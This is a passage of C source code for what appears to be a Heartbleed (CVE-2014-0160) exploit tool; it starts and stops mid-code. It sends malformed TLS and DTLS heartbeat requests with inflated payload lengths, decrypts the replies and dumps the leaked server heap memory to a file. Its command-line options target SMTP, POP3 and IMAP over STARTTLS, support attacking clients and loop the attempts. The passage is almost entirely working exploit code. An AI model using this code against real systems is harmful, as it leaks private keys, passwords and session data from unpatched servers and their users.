STARTTLS */\r\n\tint rc, go = 0;\r\n\tchar* buffer;\r\n\tchar* line1;\r\n\tchar* line2; \r\n\tswitch(precmd){\r\n\t\tcase 0:\r\n\t\t\tline1 = "EHLO test\\n";\r\n\t\t\tline2 = "STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\tline1 = "CAPA\\n";\r\n\t\t\tline2 = "STLS\\n";\r\n\t\t\tbreak;\r\n\t\tcase 2:\r\n\t\t\tline1 = "a001 CAPB\\n";\r\n\t\t\tline2 = "a002 STARTTLS\\n";\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tgo = 1;\r\n\t\t\tbreak;\r\n\t}\r\n\tif(go==0){\r\n\t\tbuffer = malloc(2049);\r\n\t if(buffer==NULL){\r\n \tprintf("[ error in malloc()\\n");\r\n \texit(0);\r\n\t }\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tprintf("[ banner: %s",buffer);\r\n\t\tsend(sd,line1,strlen(line1),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t\tsend(sd,line2,strlen(line2),0);\r\n\t\tmemset(buffer,0,2049);\r\n\t\trc = read(sd,buffer,2048);\r\n\t\tif(verbose==1){\r\n\t\t\tprintf("%s\\n",buffer);\r\n\t\t}\r\n\t}\r\n\treturn sd;\r\n}\r\n\r\nvoid* heartbleed(connection *c,unsigned int type){\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n *p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n\t\t\ts2n(0xffff,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n ret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3);\r\n OPENSSL_free(buf);\r\n\treturn c;\r\n}\r\n\r\nvoid* dtlsheartbleed(connection *c,unsigned int type){\r\n\r\n\tunsigned char *buf, *p;\r\n int ret;\r\n\tbuf = OPENSSL_malloc(1 + 2 + 16);\r\n\tmemset(buf, '\\0', sizeof buf);\r\n\tif(buf==NULL){\r\n printf("[ error in malloc()\\n");\r\n exit(0);\r\n }\r\n\tp = buf;\r\n 
*p++ = TLS1_HB_REQUEST;\r\n\tswitch(type){\r\n\t\tcase 0:\r\n\t\t\ts2n(0x0,p);\r\n\t\t\tbreak;\r\n\t\tcase 1:\r\n//\t\t\ts2n(0xffff,p);\r\n//\t\t\ts2n(0x3feb,p);\r\n\t\t\ts2n(0x0538,p);\r\n\t\t\tbreak;\r\n\t\tdefault:\r\n\t\t\tprintf("[ setting heartbeat payload_length to %u\\n",type);\r\n\t\t\ts2n(type,p);\r\n\t\t\tbreak;\r\n\t}\r\n\ts2n(c->sslHandle->tlsext_hb_seq, p);\r\n\tprintf("[ <3 <3 <3 heart bleed <3 <3 <3\\n");\r\n\r\n ret = dtls1_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3 + 16);\r\n\r\n\tif (ret >= 0)\r\n\t\t{\r\n\t\tif (c->sslHandle->msg_callback)\r\n\t\t\tc->sslHandle->msg_callback(1, c->sslHandle->version, TLS1_RT_HEARTBEAT,\r\n\t\t\t\tbuf, 3 + 16,\r\n\t\t\t\tc->sslHandle, c->sslHandle->msg_callback_arg);\r\n\r\n\t\tdtls1_start_timer(c->sslHandle);\r\n\t\tc->sslHandle->tlsext_hb_pending = 1;\r\n\t\t}\r\n\r\n OPENSSL_free(buf);\r\n\r\n\treturn c;\r\n}\r\n\r\nvoid* sneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned mac_size, orig_len;\r\n size_t extra;\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n if (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER)\r\n extra=SSL3_RT_MAX_EXTRA;\r\n else\r\n extra=0;\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < SSL3_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS 
length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n if (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n rr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n tls1_enc(s,0);\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n 
SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' ':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many 
bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\n\r\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\r\n\tchar *p;\r\n int ssl_major,ssl_minor,al;\r\n int enc_err,n,i;\r\n SSL3_RECORD *rr;\r\n SSL_SESSION *sess;\r\n\tSSL* s;\r\n\tDTLS1_BITMAP *bitmap;\r\n\tunsigned int is_next_epoch;\r\n unsigned char md[EVP_MAX_MD_SIZE];\r\n short version;\r\n unsigned int mac_size, orig_len;\r\n\r\n rr= &(c->sslHandle->s3->rrec);\r\n sess=c->sslHandle->session;\r\n s = c->sslHandle;\r\n\r\nagain:\r\n if ((s->rstate != SSL_ST_READ_BODY) ||\r\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\r\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\r\n if (n <= 0)\r\n goto apple; \r\n\r\n s->rstate=SSL_ST_READ_BODY;\r\n p=s->packet;\r\n rr->type= *(p++);\r\n ssl_major= *(p++);\r\n ssl_minor= *(p++);\r\n version=(ssl_major<<8)|ssl_minor;\r\n\t\t\tn2s(p,rr->epoch);\r\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\r\n\t\t\tp+=6;\r\n n2s(p,rr->length);\r\n\t\t\tif(rr->type==24){\r\n\t\t\t\tprintf("[ heartbeat returned type=%d length=%u\\n",rr->type, rr->length);\r\n\t\t\t\tif(rr->length > 16834){\r\n\t\t\t\t\tprintf("[ error: got a malformed TLS length.\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse{\r\n\t\t\t\tprintf("[ incorrect record type=%d length=%u returned\\n",rr->type,rr->length);\r\n\t\t\t\ts->packet_length=0;\r\n\t\t\t\tbadpackets++;\r\n\t\t\t\tif(badpackets > 3){\r\n\t\t\t\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\t\t\t\texit(0);\r\n\t\t\t\t}\r\n\t\t\t\tgoto apple;\r\n\t\t\t}\r\n }\r\n\r\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\r\n i=rr->length;\r\n n=ssl3_read_n(s,i,i,1);\r\n if (n <= 0) goto apple; \r\n }\r\n\t\tif ( n != i)\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length = 0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\tprintf("[ decrypting SSL packet\\n");\r\n s->rstate=SSL_ST_READ_HEADER; \r\n\r\n\tbitmap = dtls1_get_bitmap(s, rr, 
&is_next_epoch);\r\n\tif ( bitmap == NULL)\r\n\t\t{\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\r\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\r\n\t\t !dtls1_record_replay_check(s, bitmap))\r\n\t\t\t{\r\n\t\t\trr->length = 0;\r\n\t\t\ts->packet_length=0;\r\n\t\t\tgoto again;\r\n\t\t\t}\r\n\r\n\tif (rr->length == 0) goto again;\r\nif (is_next_epoch)\r\n\t\t{\r\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\r\n\t\t\t{\r\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\r\n\t\t\t}\r\n\t\trr->length = 0;\r\n\t\ts->packet_length = 0;\r\n\t\tgoto again;\r\n\t\t}\r\n\r\n\r\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\r\n rr->data=rr->input;\r\n\torig_len=rr->length;\r\n\r\n dtls1_enc(s,0);\r\n\r\n if((sess != NULL) &&\r\n (s->enc_read_ctx != NULL) &&\r\n (EVP_MD_CTX_md(s->read_hash) != NULL))\r\n {\r\n unsigned char *mac = NULL;\r\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\r\n mac_size=EVP_MD_CTX_size(s->read_hash);\r\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\r\n orig_len = rr->length+((unsigned int)rr->type>>8);\r\n if(orig_len < mac_size ||\r\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\r\n orig_len < mac_size+1)){\r\n al=SSL_AD_DECODE_ERROR;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\r\n }\r\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\r\n mac = mac_tmp;\r\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\r\n rr->length -= mac_size;\r\n }\r\n else{\r\n rr->length -= mac_size;\r\n mac = &rr->data[rr->length];\r\n }\r\n i = tls1_mac(s,md,0);\r\n\r\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\r\n enc_err = -1;\r\n\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\r\n enc_err = -1;\r\n }\r\n if(enc_err < 0){\r\n al=SSL_AD_BAD_RECORD_MAC;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\r\n goto 
apple;\r\n }\r\n if(s->expand != NULL){\r\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n if (!ssl3_do_uncompress(s)) {\r\n al=SSL_AD_DECOMPRESSION_FAILURE;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\r\n goto apple;\r\n }\r\n }\r\n\r\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\r\n al=SSL_AD_RECORD_OVERFLOW;\r\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\r\n goto apple;\r\n }\r\n rr->off=0;\r\n s->packet_length=0;\r\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\r\n\tif(first==0){\r\n\t\tuint heartbleed_len = 0;\r\n\t\tchar* fp = s->s3->rrec.data;\r\n\t\t(long)fp++;\r\n\t\tmemcpy(&heartbleed_len,fp,2);\r\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\r\n\t\tfirst = 2;\r\n\t\tleakbytes = heartbleed_len + 16;\r\n\t\tprintf("[ heartbleed leaked length=%u\\n",heartbleed_len);\r\n\t}\r\n\tif(verbose==1){\r\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf("%02X%c",rr->data[z],((z+1)%16)?' 
':'\\n'); }\r\n printf("\\n");\r\n }\r\n\tleakbytes-=rr->length;\r\n\tif(leakbytes > 0){\r\n\t\trepeat = 1;\r\n\t}\r\n\telse{\r\n\t\trepeat = 0;\r\n\t}\r\n\tprintf("[ final record type=%d, length=%u\\n", rr->type, rr->length);\r\n\tint output = s->s3->rrec.length-3;\r\n\tif(output > 0){\r\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\r\n\t if(first==2){\r\n\t\t\tfirst--;\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\t/* first three bytes are resp+len */\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length-3,filename);\r\n\t\t}\r\n\t\telse{\r\n\t\t\t/* heap data & 16 bytes padding */\r\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\r\n\t\t\tprintf("[ wrote %d bytes of heap to file '%s'\\n",s->s3->rrec.length,filename);\r\n\t\t}\r\n\t\tclose(fd);\r\n\t}\r\n\telse{\r\n\t\tprintf("[ nothing from the heap to write\\n");\r\n\t}\r\n\r\n\t\t\tdtls1_stop_timer(c->sslHandle);\r\n\t\t\tc->sslHandle->tlsext_hb_seq++;\r\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\r\n\r\n\treturn;\r\napple:\r\n printf("[ problem handling SSL record packet - wrong type?\\n");\r\n\tbadpackets++;\r\n\tif(badpackets > 3){\r\n\t\tprintf("[ error: too many bad packets recieved\\n");\r\n\t\texit(0);\r\n\t}\r\n\treturn;\r\n}\r\n\r\nstatic DTLS1_BITMAP *\r\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\r\n {\r\n \r\n *is_next_epoch = 0;\r\n\r\n if (rr->epoch == s->d1->r_epoch)\r\n return &s->d1->bitmap;\r\n\r\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\r\n (rr->type == SSL3_RT_HANDSHAKE ||\r\n rr->type == SSL3_RT_ALERT))\r\n {\r\n *is_next_epoch = 1;\r\n return &s->d1->next_bitmap;\r\n }\r\n\r\n return NULL;\r\n }\r\n\r\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tmemcpy 
(s->s3->rrec.seq_num,seq,8);\r\n\t\treturn 1;\r\n\t\t}\r\n\tshift = -cmp;\r\n\tif (shift >= sizeof(bitmap->map)*8)\r\n\t\treturn 0;\r\n\telse if (bitmap->map & (1UL<<shift))\r\n\t\treturn 0;\r\n\r\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\r\n\treturn 1;\r\n\t}\r\n\r\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\r\n{\tint ret,sat,brw,i;\r\n\r\n\tif (sizeof(long) == 8) do\r\n\t{\tconst union { long one; char little; } is_endian = {1};\r\n\t\tlong l;\r\n\r\n\t\tif (is_endian.little)\t\t\tbreak;\r\n\r\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\r\n\r\n\t\tl = *((long *)v1);\r\n\t\tl -= *((long *)v2);\r\n\t\tif (l>128)\t\treturn 128;\r\n\t\telse if (l<-128)\treturn -128;\r\n\t\telse\t\t\treturn (int)l;\r\n\t} while (0);\r\n\r\n\tret = (int)v1[7]-(int)v2[7];\r\n\tsat = 0;\r\n\tbrw = ret>>8;\r\n\tif (ret & 0x80)\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= ~brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\telse\r\n\t{\tfor (i=6;i>=0;i--)\r\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\r\n\t\t\tsat |= brw;\r\n\t\t\tbrw >>= 8;\r\n\t\t}\r\n\t}\r\n\tbrw <<= 8;\r\n\r\n\tif (sat&0xff)\treturn brw | 0x80;\r\n\telse\t\treturn brw + (ret&0xFF);\r\n}\r\n\r\nstatic int\r\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\r\n\t{\r\n\tDTLS1_RECORD_DATA *rdata;\r\n\tpitem *item;\r\n\r\n\tif (pqueue_size(queue->q) >= 100)\r\n\t\treturn 0;\r\n\t\t\r\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\r\n\titem = pitem_new(priority, rdata);\r\n\tif (rdata == NULL || item == NULL)\r\n\t\t{\r\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\r\n\t\tif (item != NULL) pitem_free(item);\r\n\t\t\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\trdata->packet = s->packet;\r\n\trdata->packet_length = s->packet_length;\r\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\r\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\r\n\r\n\titem->data = 
rdata;\r\n\r\n#ifndef OPENSSL_NO_SCTP\r\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\r\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\r\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\r\n\t}\r\n#endif\r\n\r\n\tif (pqueue_insert(queue->q, item) == NULL)\r\n\t\t{\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\r\n\ts->packet = NULL;\r\n\ts->packet_length = 0;\r\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\r\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\r\n\t\r\n\tif (!ssl3_setup_buffers(s))\r\n\t\t{\r\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\r\n\t\tOPENSSL_free(rdata);\r\n\t\tpitem_free(item);\r\n\t\treturn(0);\r\n\t\t}\r\n\t\r\n\treturn(1);\r\n\t}\r\n\r\n\r\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\r\n\t{\r\n\tint cmp;\r\n\tunsigned int shift;\r\n\tconst unsigned char *seq = s->s3->read_sequence;\r\n\r\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\r\n\tif (cmp > 0)\r\n\t\t{\r\n\t\tshift = cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\r\n\t\telse\r\n\t\t\tbitmap->map = 1UL;\r\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\r\n\t\t}\r\n\telse\t{\r\n\t\tshift = -cmp;\r\n\t\tif (shift < sizeof(bitmap->map)*8)\r\n\t\t\tbitmap->map |= 1UL<<shift;\r\n\t\t}\r\n\t}\r\n\r\n\r\nvoid usage(){\r\n\tprintf("[\\n");\r\n\tprintf("[ --server|-s <ip/dns> - the server to target\\n");\r\n\tprintf("[ --port|-p <port> - the port to target\\n");\r\n\tprintf("[ --file|-f <filename> - file to write data to\\n");\r\n\tprintf("[ --bind|-b <ip> - bind to ip for exploiting clients\\n");\r\n\tprintf("[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n");\r\n\tprintf("[\t\t\t 0 = SMTP\\n");\r\n\tprintf("[\t\t\t 1 = POP3\\n");\r\n\tprintf("[\t\t\t 2 = IMAP\\n");\r\n\tprintf("[ --loop|-l\t\t - loop the exploit attempts\\n");\r\n\tprintf("[ --type|-t <n> - select 
exploit to try\\n");\r\n\tprintf("[ 0 = null length\\n");\r\n\tprintf("[\t\t\t 1 = max leak\\n");\r\n\tprintf("[\t\t\t n = heartbeat payload_length\\n");\r\n\tprintf("[ --udp|-u - use dtls/udp\\n");\r\n\tprintf("[\\n");\r\n\tprintf("[ --verbose|-v - output leak to screen\\n");\r\n\tprintf("[ --help|-h - this output\\n");\r\n\tprintf("[\\n");\r\n\texit(0);\r\n}\r\n\r\nint main(int argc, char* argv[]){\r\n\tint ret, port, userc, index;\r\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\r\n\tint loop = 0;\r\n\tstruct hostent *h;\r\n\tconnection* c;\r\n\tchar *host, *file;\r\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\r\n\tprintf("[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n");\r\n\tprintf("[ =============================================================\\n");\r\n static struct option options[] = {\r\n \t{"server", 1, 0, 's'},\r\n\t {"port", 1, 0, 'p'},\r\n\t\t{"file", 1, 0, 'f'},\r\n\t\t{"type", 1, 0, 't'},\r\n\t\t{"bind", 1, 0, 'b'},\r\n\t\t{"verbose", 0, 0, 'v'},\r\n\t\t{"precmd", 1, 0, 'c'},\r\n\t\t{"loop", 0, 0, 'l'},\r\n\t\t{"help", 0, 0,'h'},\r\n\t\t{"udp", 0, 0, 'u'}\r\n };\r\n\twhile(userc != -1) {\r\n\t userc = getopt_long(argc,argv,"s:p:f:t:b:c:lvhu",options,&index);\t\r\n \tswitch(userc) {\r\n \t\tcase -1:\r\n\t break;\r\n \t case 's':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\r\n\t\t\t\t\tif(h==NULL){\r\n\t\t\t\t\t\tprintf("[!] 
FATAL: unknown host '%s'\\n",optarg);\r\n\t\t\t\t\t\texit(1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(host==NULL){\r\n \t\t\t\tprintf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n \t\t\t}\r\n\t\t\t\tbreak;\r\n\t case 'p':\r\n\t\t\t\tif(iport==0){\r\n\t\t\t\t\tport = atoi(optarg);\r\n\t\t\t\t\tiport = 1;\r\n\t\t\t\t}\r\n \t break;\r\n\t\t\tcase 'f':\r\n\t\t\t\tif(ifile==0){\r\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\r\n\t\t\t\t\tif(file==NULL){\r\n\t\t\t\t printf("[ error in malloc()\\n");\r\n \t\t\t\texit(0);\r\n \t\t\t\t}\r\n\t\t\t\t\tsprintf(file,"%s",optarg);\r\n\t\t\t\t\tifile = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 't':\r\n\t\t\t\tif(itype==0){\r\n\t\t\t\t\ttype = atoi(optarg);\r\n\t\t\t\t\titype = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'h':\r\n\t\t\t\tusage();\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'b':\r\n\t\t\t\tif(ihost==0){\r\n\t\t\t\t\tihost = 1;\r\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\r\n\t\t\t\t\tif(host==NULL){\r\n\t\t\t \t printf("[ error in malloc()\\n");\r\n\t\t\t\t exit(0);\r\n\t\t\t\t }\r\n\t\t\t\t\tsprintf(host,"%s",optarg);\r\n\t\t\t\t\tbind = 1;\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'c':\r\n\t\t\t\tif(iprecmd == 